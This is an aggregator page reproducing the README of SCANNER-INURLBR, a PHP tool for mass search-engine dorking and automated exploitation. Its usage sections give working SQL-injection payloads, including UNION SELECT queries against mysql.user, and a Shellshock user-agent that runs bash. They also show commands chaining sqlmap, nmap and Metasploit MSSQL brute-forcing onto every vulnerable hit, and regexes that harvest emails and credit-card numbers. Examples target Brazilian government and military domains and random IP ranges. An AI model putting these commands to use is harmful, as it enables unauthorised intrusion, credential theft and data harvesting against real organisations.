GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects β†’ MrCl0wnLab β†’ SCANNER-INURLBR

MrCl0wnLab / SCANNER-INURLBR

Licence: GPL-2.0 license
Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.

Labels

hackingcybersecurityhacking-toolgoogle-dorkssecurity-toolsdorking

Projects that are alternatives of or similar to SCANNER-INURLBR

evildork
Evildork targeting your fianceeπŸ‘οΈ
Stars: ✭ 46 (-48.89%)
Mutual labels:  hacking-tool, google-dorks, dorking
Search That Hash
πŸ”ŽSearches Hash APIs to crack your hash quicklyπŸ”Ž If hash is not found, automatically pipes into HashCat⚑
Stars: ✭ 466 (+417.78%)
Mutual labels:  cybersecurity, hacking-tool
Webspoilt
This script will you help to find the information about the website and to help in penetrating testing
Stars: ✭ 34 (-62.22%)
Mutual labels:  cybersecurity, hacking-tool
Lockdoor Framework
πŸ” Lockdoor Framework : A Penetration Testing framework with Cyber Security Resources
Stars: ✭ 677 (+652.22%)
Mutual labels:  cybersecurity, hacking-tool
HostEnumerator
A tool that automates the process of enumeration
Stars: ✭ 29 (-67.78%)
Mutual labels:  cybersecurity, hacking-tool
phomber
Phomber is infomation grathering tool that reverse search phone numbers and get their details, written in python3.
Stars: ✭ 59 (-34.44%)
Mutual labels:  cybersecurity, hacking-tool
Jasmin-Ransomware
Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks. Jasmin helps security researchers to overcome the risk of external attacks.
Stars: ✭ 84 (-6.67%)
Mutual labels:  cybersecurity, hacking-tool
trj
Execute any command in other's computer using a trojan horse coded and compiled in C. Just for educational purpose.
Stars: ✭ 21 (-76.67%)
Mutual labels:  cybersecurity, hacking-tool
Wifipassword Stealer
Get All Registered Wifi Passwords from Target Computer.
Stars: ✭ 97 (+7.78%)
Mutual labels:  cybersecurity, hacking-tool
reosploit
A Tool that Finds, Enumerates, and Exploits Reolink Cameras.
Stars: ✭ 89 (-1.11%)
Mutual labels:  cybersecurity, hacking-tool
phishEye
phishEye is an ultimate phishing tool in python. Includes popular websites like Facebook, Twitter, Instagram, LinkedIn, GitHub, Dropbox, and many others. Created with Flask, custom templates, and tunneled with ngrok and localhost.run.
Stars: ✭ 47 (-47.78%)
Mutual labels:  cybersecurity, hacking-tool
awesome-ddos-tools
Collection of several DDos tools.
Stars: ✭ 75 (-16.67%)
Mutual labels:  cybersecurity, hacking-tool
Keylogger
Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
Stars: ✭ 604 (+571.11%)
Mutual labels:  cybersecurity, hacking-tool
Slowloris
Asynchronous Python implementation of SlowLoris DoS attack
Stars: ✭ 51 (-43.33%)
Mutual labels:  cybersecurity, hacking-tool
Lucifer
A Powerful Penetration Tool For Automating Penetration Tasks Such As Local Privilege Escalation, Enumeration, Exfiltration and More... Use Or Build Automation Modules To Speed Up Your Cyber Security Life
Stars: ✭ 302 (+235.56%)
Mutual labels:  cybersecurity, hacking-tool
AttackSurfaceManagement
Discover the attack surface and prioritize risks with our continuous Attack Surface Management (ASM) platform - Sn1per Professional #pentest #redteam #bugbounty
Stars: ✭ 45 (-50%)
Mutual labels:  cybersecurity, hacking-tool
Malicious-Urlv5
A multi-layered and multi-tiered Machine Learning security solution, it supports always on detection system, Django REST framework used, equipped with a web-browser extension that uses a REST API call.
Stars: ✭ 35 (-61.11%)
Mutual labels:  cybersecurity
CVE-2020-5902
exploit code for F5-Big-IP (CVE-2020-5902)
Stars: ✭ 37 (-58.89%)
Mutual labels:  hacking-tool
haiti
πŸ”‘ Hash type identifier (CLI & lib)
Stars: ✭ 287 (+218.89%)
Mutual labels:  cybersecurity
TokenBreaker
JSON RSA to HMAC and None Algorithm Vulnerability POC
Stars: ✭ 51 (-43.33%)
Mutual labels:  hacking-tool
View All Similar Projects βž”

This is a fork of the original project.

Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. 
The usual disclaimer applies, especially the fact that me (MrCl0wnLab) is not liable for any 
damages caused by direct or indirect use of the information or functionality provided by these 
programs. The author or any Internet provider bears NO responsibility for content or misuse 
of these programs or any derivatives thereof. By using these programs you accept the fact 
that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these 
programs is not MrCl0wnLab's responsibility.

Autor:    MrCl0wn
Blog:     https://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Email:    mrcl0wnlab\@\gmail.com
Script:   INURLBR
Codename: Facada
Version:  3.0.0

Screenshots

Screenshot

Email extraction

php inurlbr.php  --dork '"com.br" contato  .xlsx' -m  -s emails.txt -q all

Screenshot

External Command

php inurlbr.php --dork '"com.br" index.php?id id' -s sqlmap.txt --exploit-get "?Β΄'%270x27;" --command-vul 'python ../sqlmap-dev/sqlmap.py -u "_TARGETFULL_" --dbs --batch --threads 10 -p id --random-agent'

Screenshot

Filter Result Value

php inurlbr.php --dork '"com.br/wp-login.php"' -t 2  -a 'wp-login.php?action=lostpassword' -s filter_string.txt

Screenshot

Simple fuzz

php inurlbr.php --target 'https://YOUR_TARGET' -o fuzz.txt -s php_result.txt -t 2 -a 'phpMyAdmin 2.11.4'

Screenshot

Parallel terminal ( popup )

php inurlbr.php --target 'https://YOUR_TARGET' -o fuzz.txt -s popup_result.txt -t 2 -a 'phpMyAdmin 2.11.4' --command-vul "nmap -sV -v  _TARGET_ ;"  --popup

Screenshot

Extract urls using archive.org

php inurlbr.php  -o 'defense.gov.txt' --au -s 'defense.gov.out'

Screenshot

Extract values using regex

php inurlbr.php --dork 'contato telefone' -s 'reg.txt' -q 1 --regexp-filter '([0-9]{2}[6789][0-9]{3,4}[0-9]{4})'

Screenshot

Validate values using regex

php inurlbr.php --dork 'contato telefone' -s 'reg.txt' -q 1 --regexp '([0-9]{2}[6789][0-9]{3,4}[0-9]{4})'

Screenshot

Lib & Permission

 ----------------------------------------------------------
PHP Version         7.4.16
php5 curl           LIB
php5 cli            LIB   
cURL support        enabled
cURL Information    7.24.0
allow_url_fopen     On
permission          Reading & Writing
User                root privilege, or is in the sudoers group
Operating system    LINUX
Proxy random        TOR 
 ----------------------------------------------------------
[+] PERMISSION EXECUTION: chmod +x inurlbr.php
[+] INSTALLING LIB CURL: sudo apt-get install php7-curl
[+] INSTALLING LIB CLI: sudo apt-get install php7-cli
[+] INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en
 ----------------------------------------------------------
resume: apt-get install curl libcurl3 libcurl3-dev php7 php7-cli php7-curl

Help

     β–ˆβ–ˆβ–‘ β–ˆβ–ˆ    β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ     β–ˆβ–ˆβ–“        β–ˆβ–ˆβ–“β–ˆβ–ˆβ–ˆ  
    β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’   β–“β–ˆ   β–€    β–“β–ˆβ–ˆβ–’       β–“β–ˆβ–ˆβ–‘  β–ˆβ–ˆβ–’
    β–’β–ˆβ–ˆβ–€β–€β–ˆβ–ˆβ–‘   β–’β–ˆβ–ˆβ–ˆ      β–’β–ˆβ–ˆβ–‘       β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–“β–’
    β–‘β–“β–ˆ β–‘β–ˆβ–ˆ    β–’β–“β–ˆ  β–„    β–’β–ˆβ–ˆβ–‘       β–’β–ˆβ–ˆβ–„β–ˆβ–“β–’ β–’
    β–‘β–“β–ˆβ–’β–‘β–ˆβ–ˆβ–“   β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’   β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’   β–’β–ˆβ–ˆβ–’ β–‘  β–‘
    β–’ β–‘β–‘β–’β–‘β–’   β–‘β–‘ β–’β–‘ β–‘   β–‘ β–’β–‘β–“  β–‘   β–’β–“β–’β–‘ β–‘  β–‘
    β–’ β–‘β–’β–‘ β–‘    β–‘ β–‘  β–‘   β–‘ β–‘ β–’  β–‘   β–‘β–’ β–‘     
    β–‘  β–‘β–‘ β–‘      β–‘        β–‘ β–‘      β–‘β–‘       
    β–‘  β–‘  β–‘      β–‘  β–‘       β–‘  β–‘            
                                         
-h
--help   Alternative long length help command.
--ajuda  Command to specify Help.
--info   Information script.
--update Code update.    
-q       Choose which search engine you want through [1...24] / [e1..6]]:
     [options]:
     1   - GOOGLE / (CSE) GENERIC RANDOM / API
     2   - BING
     3   - YAHOO BR
     4   - ASK
     6   - GOOGLE (API)
     7   - LYCOS
     8   - UOL BR
     9   - YAHOO US
     10  - SAPO
     11  - DMOZ
     12  - GIGABLAST
     13  - NEVER
     17  - HOTBUSCA
     19  - HKSEARCH
     20  - EZILION
     21  - SOGOU
     22  - DUCK DUCK GO
     24  - GOOGLE(CSE) GENERIC RANDOM
     25  - EXALEAD
     26  - STARTPAGE
     27  - QWANT
     ----------------------------------------
                 SPECIAL MOTORS
     ----------------------------------------
     e1  - TOR FIND
     e2  - ELEPHANT
     e3  - TORSEARCH
     e4  - GORCH
     e5  - WIKILEAKS
     e6  - AHMIA
     e7  - OTN
     e8  - EXPLOITS SHODAN
     ----------------------------------------
     all - All search engines / not special motors
     Default:    1
     Example: -q {op}
     Usage:   -q 1
              -q 5
               Using more than one engine:  -q 1,2,5,6,11,24
               Using all engines:      -q all
     
 --proxy Choose which proxy you want to use through the search engine:
     Example: --proxy {proxy:port}
     Usage:   --proxy localhost:8118
              --proxy socks5://googleinurl@localhost:9050
              --proxy http://admin:[email protected]:8080
   
 --proxy-file Set font file to randomize your proxy to each search engine.
     Example: --proxy-file {proxys}
     Usage:   --proxy-file proxys_list.txt

 --time-proxy Set the time how often the proxy will be exchanged.
     Example: --time-proxy {second}
     Usage:   --time-proxy 10

 --proxy-http-file Set file with urls http proxy, 
     are used to bular capch search engines
     Example: --proxy-http-file {youfilehttp}
     Usage:   --proxy-http-file http_proxys.txt
         

 --tor-random Enables the TOR function, each usage links an unique IP.
 
 -t  Choose the validation type: op 1, 2, 3, 4, 5
     [options]:
     1   - The first type uses default errors considering the script:
     It establishes connection with the exploit through the get method.
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}
   
     2   -  The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'
     It also establishes connection with the exploit through the get method
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}
   
     3   - The third type combine both first and second types:
     Then, of course, it also establishes connection with the exploit through the get method
     Demo: www.target.com.br{exploit}
     Default:    1
     Example: -t {op}
     Usage:   -t 1
     
     4   - The fourth type a validation based on source file and will be enabled scanner standard functions.
     The source file their values are concatenated with target url.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/index.php?id=
     /pag/index.php?id=
     /brazil.php?new=
     Demo: 
     www.target.com.br/admin/index.php?id={exploit}
     www.target.com.br/pag/index.php?id={exploit}
     www.target.com.br/brazil.php?new={exploit}
     
     5   - (FIND PAGE) The fifth type of validation based on the source file,
     Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/admin.php
     /admin.asp
     /admin.aspx
     Demo: 
     www.target.com.br/admin/admin.php
     www.target.com.br/admin.asp
     www.target.com.br/admin.aspx
     Observation: If it shows the code 200 will be separated in the output file

     DEFAULT ERRORS:  
     
     [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL,           [*]ZEND FRAMEWORK, 
     [*]ERROR MARIADB,   [*]ERROR MYSQL,          [*]ERROR JBOSSWEB,        [*]ERROR MICROSOFT,
     [*]ERROR ODBC,      [*]ERROR POSTGRESQL,     [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
     [*]CMS WORDPRESS,   [*]SHELL WEB,            [*]ERROR JDBC,            [*]ERROR ASP,
     [*]ERROR ORACLE,    [*]ERROR DB2,            [*]JDBC CFM,              [*]ERROS LUA, 
     [*]ERROR INDEFINITE
     
         
 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
 
 --dork-file Set font file with your search dorks.
     Example: --dork-file {dork_file}
     Usage:   --dork-file 'dorks.txt'

 --exploit-get Defines which exploit will be injected through the GET method to each URL found.
     Example: --exploit-get {exploit_get}
     Usage:   --exploit-get "?'Β΄%270x27;"
     
 --exploit-post Defines which exploit will be injected through the POST method to each URL found.
     Example: --exploit-post {exploit_post}
     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?Β΄0x273exploit;&botao=ok'
     
 --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all.   
     The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_      
     Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'
     _TARGET_ is the specified URL/TARGET obtained by the process
     _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.
     Example: --exploit-command {exploit-command}
     Usage:   --exploit-command '/admin/config.conf'  
     
 -a  Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:   -a '<title>hello world</title>'
     
 -d  Specify the script usage op 1, 2, 3, 4, 5.
     Example: -d {op}
     Usage:   -d 1 /URL of the search engine.
              -d 2 /Show all the url.
              -d 3 /Detailed request of every URL.
              -d 4 /Shows the HTML of every URL.
              -d 5 /Detailed request of all URLs.
              -d 6 /Detailed PING - PONG irc.    
             
 -s  Specify the output file where it will be saved the vulnerable URLs.
     
     Example: -s {file}
     Usage:   -s your_file.txt
     
 -o  Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
     Example: -o {file_where_my_urls_are}
     Usage:   -o tests.txt
   
 --persist  Attempts when Google blocks your search.
     The script tries to another google host / default = 4
     Example: --persist {number_attempts}
     Usage:   --persist 7

 --ifredirect  Return validation method post REDIRECT_URL
     Example: --ifredirect {string_validation}
     Usage:   --ifredirect '/admin/painel.php'

 -m  Enable the search for emails on the urls specified.
  
 -u  Enables the search for URL lists on the host specified.

 --ua  Enables the search for URL lists on the host specified using archive.org.

 --gc Enable validation of values ​​with google webcache.
     
 --pr  Progressive scan, used to set operators (dorks), 
     makes the search of a dork and valid results, then goes a dork at a time.
  
 --file-cookie Open cookie file.
     
 --save-as Save results in a certain place.

 --shellshock Explore shellshock vulnerability by setting a malicious user-agent.
 
 --popup Run --command all or vuln in a parallel terminal.

 --cms-check Enable simple check if the url / target is using CMS.

 --no-banner Remove the script presentation banner.
     
 --unique Filter results in unique domains.

 --beep Beep sound when a vulnerability is found.
     
 --alexa-rank Show alexa positioning in the results.
     
 --robots Show values file robots.
      
 --range Set range IP.
      Example: --range {range_start,rage_end}
      Usage:   --range '172.16.0.5#172.16.0.255'

 --range-rand Set amount of random ips.
      Example: --range-rand {rand}
      Usage:   --range-rand '50'

 --irc Sending vulnerable to IRC / server channel.
      Example: --irc {server#channel}
      Usage:   --irc 'irc.rizon.net#inurlbrasil'

 --http-header Set HTTP header.
      Example: --http-header {youemail}
      Usage:   --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'
          
 --sedmail Sending vulnerable to email.
      Example: --sedmail {youemail}
      Usage:   --sedmail [email protected]
          
 --delay Delay between research processes.
      Example: --delay {second}
      Usage:   --delay 10
  
 --time-out Timeout to exit the process.
      Example: --time-out {second}
      Usage:   --time-out 10

 --ifurl Filter URLs based on their argument.
      Example: --ifurl {ifurl}
      Usage:   --ifurl index.php?id=

 --ifcode Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:   --ifcode 200
 
 --ifemail Filter E-mails based on their argument.
     Example: --ifemail {file_where_my_emails_are}
     Usage:   --ifemail sp.gov.br

 --url-reference Define referring URL in the request to send him against the target.
      Example: --url-reference {url}
      Usage:   --url-reference http://target.com/admin/user/valid.php
 
 --mp Limits the number of pages in the search engines.
     Example: --mp {limit}
     Usage:   --mp 50
     
 --user-agent Define the user agent used in its request against the target.
      Example: --user-agent {agent}
      Usage:   --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
      Usage-exploit / SHELLSHOCK:   
      --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
      Complete command:    
      php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'
 
 --sall Saves all urls found by the scanner.
     Example: --sall {file}
     Usage:   --sall your_file.txt

 --command-vul Every vulnerable URL found will execute this command parameters.
     Example: --command-vul {command}
     Usage:   --command-vul 'nmap sV -p 22,80,21 _TARGET_'
              --command-vul './exploit.sh _TARGET_ output.txt'
              --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'
                  
 --command-all Use this commmand to specify a single command to EVERY URL found.
     Example: --command-all {command}
     Usage:   --command-all 'nmap sV -p 22,80,21 _TARGET_'
              --command-all './exploit.sh _TARGET_ output.txt'
              --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
    [!] Observation:
   
    _TARGET_ will be replaced by the URL/target found, although if the user  
    doesn't input the get, only the domain will be executed.
   
    _TARGETFULL_ will be replaced by the original URL / target found.
       
    _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.
       
    _TARGETIP_ return of ip URL / target found.
        
    _URI_ Back URL set of folders / target found.
        
    _RANDOM_ Random strings.
        
    _PORT_ Capture port of the current test, within the --port-scan process.
   
    _EXPLOIT_  will be replaced by the specified command argument --exploit-command.
   The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_

 --replace Replace values ​​in the target URL.
    Example:  --replace {value_old[INURL]value_new}
     Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
              --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
              --replace 'index.aspx?id=[INURL]index.aspx?id=1%27Β΄'
                  
 --remove Remove values ​​in the target URL.
      Example: --remove {string}
      Usage:   --remove '/admin.php?id=0'
              
 --regexp Using regular expression to validate his research, the value of the 
    Expression will be sought within the target/URL.
    Example:  --regexp {regular_expression}
    All Major Credit Cards:
    Usage:    --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'
    
    IP Addresses:
    Usage:    --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'
    
    EMAIL:   
    Usage:    --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
    

 ---regexp-filter Using regular expression to filter his research, the value of the 
     Expression will be sought within the target/URL.
    Example:  ---regexp-filter {regular_expression}
    EMAIL:   
    Usage:    ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
 

    [!] Small commands manager:
    
 --exploit-cad Command register for use within the scanner.
    Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
    Example Format: NMAP::nmap -sV _TARGET_
    Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
    Usage:    --exploit-cad 'NMAP::nmap -sV _TARGET_' 
    Observation: Each registered command is identified by an id of your array.
                 Commands are logged in exploits.conf file.

 --exploit-all-id Execute commands, exploits based on id of use,
    (all) is run for each target found by the engine.
     Example: --exploit-all-id {id,id}
     Usage:   --exploit-all-id 1,2,8,22
         
 --exploit-vul-id Execute commands, exploits based on id of use,
    (vull) run command only if the target was considered vulnerable.
     Example: --exploit-vul-id {id,id}
     Usage:   --exploit-vul-id 1,2,8,22

 --exploit-list List all entries command in exploits.conf file.


    [!] Running subprocesses:
    
 --sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt
         
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get
         
 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-get
         
 --sub-concat Sets string to be concatenated with 
     the target host within the subprocess
     Example: --sub-concat {string}
     Usage:   --sub-concat '/login.php'

 --sub-cmd-vul Each vulnerable URL found within the sub-process
     will execute the parameters of this command.
     Example: --sub-cmd-vul {command}
     Usage:   --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-vul './exploit.sh _TARGET_ output.txt'
              --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'
                  
 --sub-cmd-all Run command to each target found within the sub-process scope.
     Example: --sub-cmd-all {command}
     Usage:   --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-all './exploit.sh _TARGET_ output.txt'
              --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'


 --port-scan Defines ports that will be validated as open.
     Example: --port-scan {ports}
     Usage:   --port-scan '22,21,23,3306'
         
 --port-cmd Define command that runs when finding an open door.
     Example: --port-cmd {command}
     Usage:   --port-cmd './xpl _TARGETIP_:_PORT_'
              --port-cmd './xpl _TARGETIP_/file.php?sqli=1'

 --port-write Send values for door.
     Example: --port-write {'value0','value1','value3'}
     Usage:   --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"



    [!] Modifying values used within script parameters:
    
 md5 Encrypt values in md5.
     Example: md5({value})
     Usage:   md5(102030)
     Usage:   --exploit-get 'user?id=md5(102030)'

 base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'
         
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'

 hex Generate random values.
     Example: random({character_counter})
     Usage:   random(8)
     Usage:   --exploit-get 'user?id=random(8)'

Commands

./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"  
   
./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;" 
   
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
   
./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'
   
./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'
   
./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'        
  
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
   
./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'
  
./inurlbr.php --dork 'new.php?id=' -s teste.txt  --exploit-get ?Β΄0x27  --command-vul 'nmap sV -p 22,80,21 _TARGET_'
   
./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?Β΄0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'
  
./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?Β΄'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'
  
./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?Β΄0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'
 
./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1  --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
  
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m
  
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u
 
./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id  1,2,6  
 
./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent  'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' 
 
./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id  1,2,6 
 
./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id  1,2,6  --irc 'irc.rizon.net#inurlbrasil'   
  
./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'  
 
./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4
  
./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?Β΄'%270x27;"
  
./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'
  
./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5
  
./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'  
 
./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'  
 
./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?Β΄'%270x27;" -q 1,2,6,4,5,9,7,8  
 
./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?Β΄'%270x27;" -q 1,2,6,4,5,9,7,8   --pr
 
./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8   --pr --shellshock
 
./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8  --sub-file 'xpls_Arbitrary_File_Download.txt'

Installation

Preferably, you can download inurlbr by cloning the Git repository:

git clone https://github.com/MrCl0wnLab/SCANNER-INURLBR.git inurlbr

The inurlbr works with php version 7.x linux platforms.

Giving permission to script execution

$chmod +x inurlbr.php
Run: ./inurlbr.php

Setting your token ipinfo

It is possible to register more than one token

./resources/token.ipinfo.inurl

Setting your strings

You can register more validation strings

./resources/strings.validation.inurl

Setting your filter strings

You can register more filter values that dirty your results

./resources/trash_list.validation.inurl

Usage

To get a list of basic options and switches use:

php inurlbr.php -h

To get a list of all options and switches use:

php inurlbr.php --help
php inurlbr.php --info
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].